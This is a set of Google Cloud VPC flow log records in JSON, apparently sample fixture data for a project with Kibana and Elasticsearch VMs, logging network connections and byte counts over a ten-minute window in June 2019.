+{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"67.43.156.13","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"67.43.156.13","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"67.43.156.13","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"67.43.156.13","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"67.43.156.13","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"67.43.156.13","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 